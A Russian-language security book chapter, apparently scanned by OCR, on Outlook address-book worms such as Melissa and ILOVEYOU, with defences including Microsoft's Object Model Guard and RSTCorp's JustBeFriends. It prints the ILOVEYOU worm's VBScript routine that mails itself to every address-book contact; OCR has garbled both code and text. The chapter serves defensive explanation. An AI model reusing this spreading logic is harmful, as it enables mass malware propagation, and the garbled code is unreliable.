Вы здесь

10. "Черви", распространяющиеся через адресную книгу Outlook



"Черви", распространяющиеся через адресную книгу Outlook


В течение нескольких последних лет XX века мошенники, избравшие своим инструментом компьютерные коды, организовывали за счет пользователей программ Outlook и Outlook Express буйную новогоднюю "вечеринку". Ими было выпущено целое полчище вирусов-червей, размножающихся по изящной технологии: осуществляя самостоятельно рассылку по каждому адресу, найденному в адресной книге жертвы, эти вирусы маскировались под сообщения, присланные из надежного источника. Это оригинальное применение методов соииа1ьной инженерии (см. главу 14) было ударом, который злой гений-изобретатель наносил наверняка. Корпорации, в которых работали десятки тысяч служащих, активно использующих Outlook, были вынуждены отказаться от применения почтовых служб, чтобы остановить поток сообщений, снующих туда-сюда от одного пользователя к другому, засоряя почтовые ящики и забивая до отказа дисковое пространство почтовых серверов. Согласитесь, тяжело удержаться от того> чтобы не открыть вложение, пришедшее от знакомого, которому вы доверяете.
Первая такая "ракета" подобного рода называлась Melissa. Хотя ее предполагаемый автор Девид Л. Смит (David L. Smith) был пойман и в конце концов признан виновным в нанесении ущерба второй степени, за которое по закону положен тюремный срок от пяти до десяти лет и штраф в размере до $150000, люди по-прежнему продолжали заниматься подобными экспериментами. Вирусы с такими привычными названиями, как Worm.Explore.Zip, BubbleBoy и ILOVEYOU появлялись один за другим, пока примерно к концу 2000 года не стало казаться, что даже средства массовой информации устали от всех этих сенсаций. Однако этот процесс все еше продолжается и поэтому заслуживает отдельного упоминания.

"Червь" ILOVEYOU



Ниже приведена подпрограмма "червя" ILOVEYOU. написанная на языке VBScript. которая обеспечивает его распространение через электронную почту (некоторые строки были разделены вручную, чтобы уместить их на странице).

sub spreadtoemail()
On Error
Resume Next
dim x,a, ctrlists,ctrentries,malead,b,regedit,regv,regad
set regedit=CreateObject("
WScript.Shell")
set cue"WScript.
CreateObject("Outlook.Application"!
set ir,api=out.GetNameSpace ("MAPI")
for ctrlists-1 to mapi.
AddressLists.Count
set a-rnapi.
Address Lists (ctrlists)
x=l
regv=regedit.RegRead
("HKEY_CURRENT_USER\Software\Microsoft\WAB\"Sa)
if (regv-"") then
regv=l
end i':
it (j.r.1.; a . AddressEntries .Count! >int (regvi 5 ther.
for cr.rer_tries=l. to a.
AddressEntries .Count
malead-a.AddressEntries(x)
regad=~""
regad=--rsgedit - RegP.ead
("HKEY_CURRENT_USER\Software\Microsof t\WAB\"4malead)
if (rec-ad-""; then
set i:iale=out.C;:eateltem(0)
male.Recipients.Add(malead)
male.Subject = "ILOVEYOU"
male.body = vbcrlf&"kindly check the attached
LOYELETTER coming from me."
male.Attachments.Add(dirsystems"
\LOVE-LETTER-FOR-YOU.TXT.vbs")
male.Send
regedit.RegWrite "HKEY_CURRENT_USER\Software
\Microsoft\WAB\"&malead,1,"
REG_DWORD"
end if
x=x+l
next
regedit.RegWrite
"HKEY CURPSMT USER\Software\Microsoft\WAB\
"&a,a.AddressEntries.Count else
regedit.RegWrite
"EKEY C'JRRENT_USER\Software\Microsoft\WAB\"
&a,a.AddressEntries.Count
end if
next
Set out--Ncthing Set n\api=Nothing
end sub

Эта простая программа длиной в 37 строк обращается к интерфейсу MAPI, чтобы отыскать местоположение адресной книги Windows (WAB — Windows Address Book) в системном реестре. Затем она создает новое почтовое послание с темой I LOVE YOU и телом kindly check the attached LOVELETTER coming from me ("будьте так любезны, прочтите вложенное любовное письмо, пришедшее вместе с данным сообщением"), которое рассылается каждому найденному адресату. Если кто-нибудь из далеких от программирования читателей думает, что речь здесь идет о какой-нибудь сложной науке, то будет уместно напомнить, что принцип работы вируса ILOVEYOU основан на дипломной работе, написанной 23-летним студентом. Кто знает, какой еще ущерб мог бы быть нанесен?

Как остановить "червей", распространяющихся через адресную книгу



После нескольких лет критики в средствах массовой информации компания Microsoft устала обвинять пользователей в том, что они сами запускают вложения электронной почты, в которых содержатся вирусы-"черви", и выпустила соответствующий модуль обновления. Он называется Outlook 2000 SR-1 E-mail Security Update и Outlook 98 E-mail Security Update (http://officeupdate.microsoft.com/2000/downloadDetails/Out2ksec.hem и Out98sec .htm соответственно). Одной из особенностей этого модуля является наличие в нем механизма защиты модели объектов (Object Model Guard), который был разработан .для предупреждения пользователей о том, что внешней программой предпринята попытка получения доступа к их адресной книге Outlook или отправки сообщений от их имени. Компания Reliable Software Technologies Corporation (RSTCorp) выпустила дополнительную утилиту, предотвращающую обращения к Outlook определенного типа, поступающие от компонента Virtual Basic Scripting Engine. Таким образом можно предотвратить распространение вирусов, подобных 1EOVEYOU. Эту дополняющую программу, которая называется JustBeFriends.dll (JBF), можно использовать совместно с модулем обновления программы Outlook, который предлагается компанией Microsoft. В отличие от механизма OMG компании Microsoft, который контролирует доступ к функциям Outlook внутри самой программы, JBF контролирует возможность доступа к Outlook или Outlook Express со стороны других приложений. Если попытка доступа осуществляется с помощью сценария, запушенного с рабочего стола или из вложения, то утилита JBF предотвращает эту попытку. В противном случае пользователь должен подтвердить, что данному приложению разрешен доступ к Outlook. 
Специалисты компании RSTCorp утверждают, что их подход более надежный, чем тот, которым воспользовалась компания Microsoft при разработке модели OMG, поскольку во втором случае необходимо обеспечить защиту огромного количества объектов, что является трудной задачей. Они также отмечают, что адреса электронной почты могут быть выявлены не только в адресной книге, но и в цифровых подписях. в теле сообщения или других документах, а также в некоторых других местах, которые могут быть обнаружены. Ограничив доступ к Outlook/OE со стороны сценариев, утилита JBF теоретически может предотвратить новые атаки, основанные на использовании широкого диапазона аналогичных приемов.
Программу JustBeFriends можно найти на узле http://www.rstcorp.com/jbf. Хотелось бы, чтобы каждый ее файл был упакован отдельно вместо того, чтобы быть упрятанным в единственный архив (в основном для большей степени доверия). Несмотря на это, авторы рекомендуют воспользоваться этой программой всем пользователям, у которых программа Outlook/OE установлена на платформе NT/2000.
Программа JustBeFriends не работает на платформе Win 9x.



Top.Mail.Ru